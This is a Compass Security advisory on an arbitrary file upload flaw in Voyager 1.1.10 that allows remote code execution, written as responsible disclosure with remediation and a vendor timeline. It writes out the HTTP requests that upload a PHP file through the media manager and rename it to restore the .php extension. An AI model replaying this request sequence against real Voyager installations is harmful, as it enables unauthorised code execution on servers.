############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Voyager # Vendor: The Control Group (Open Source) # CSNC ID: CSNC-2018-37 # Subject: Arbitrary File Upload (RCE) # Risk: Medium (CVSS 3.0 Base Score: 5.4) # CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C # Effect: Remotely exploitable # Author: Fabio Poloni # Date: 07.11.2018 # ############################################################# Introduction ------------ Voyager [1] is a Laravel Admin Package that includes BREAD(CRUD) operations, a media manager, menu builder, and much more. To upload files, there is a media manager available, which can upload, rename and delete files on the filesystem. The manager can be abused to upload executable PHP files. Affected -------- Vulnerable: * Version 1.1.10 Other versions are not tested. Technical Description --------------------- The Media Manager can be used to upload PHP files. Neither content, nor content-type will be checked. Although the extension of PHP files will be removed. ```` POST /admin/media/upload HTTP/1.1 Host: localhost:8000 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------178790972713939268652054415808 Content-Length: 510 Cookie: XSRF-TOKEN=[...]; laravel_session=[...] Connection: close -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="_token" [...] -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="upload_path" -----------------------------178790972713939268652054415808 Content-Disposition: form-data; name="file"; filename="phpinfo.php" Content-Type: text/plain -----------------------------178790972713939268652054415808-- ```` To make the file "executable" again for a standard web server, it may be renamed to a new filename including the .php extension: ```` POST /admin/media/rename_file HTTP/1.1 Host: localhost:8000 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-TOKEN: [...] X-Requested-With: XMLHttpRequest Content-Length: 123 Cookie: XSRF-TOKEN=[...]; laravel_session=[...] Connection: close filename=F0qv19ge4my0PwxcThdFMatyylQISnaH7FksTSyI.&new_filename=phpinfo.php&_token=[...] ```` The file then can be accessed as expected on "http://example.com/storage/phpinfo.php". Vulnerability Classification ---------------------------- * CVSS v3.0 Base Score: 5.4 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C Remediation ----------- Update to the latest release (1.2.0). Please see Voyager releases [2] for release notes and download links. Timeline -------- 2019-03-05: According to vendor the vulnerability has been addressed (https://github.com/the-control-group/voyager/pull/3820) 2018-12-20: Vulnerabilities confirmed 2018-12-18: Fifth contact attempt via email to a former and current maintainer, response received 2018-11-23: Forth contact attempt via email (hello@thecontrolgroup.com) and direct contact to employee on LinkedIn 2018-11-16: Third contact attempt via email (hello@thecontrolgroup.com) 2018-11-14: Second contact attempt via Twitter (@ControlGroup_SD) 2018-11-07: Initial vendor notification via contact form (https://thecontrolgroup.com/contact) 2018-11-05: Discovery by Fabio Poloni References: ----------- [1] https://github.com/the-control-group/voyager [2] https://github.com/the-control-group/voyager/releases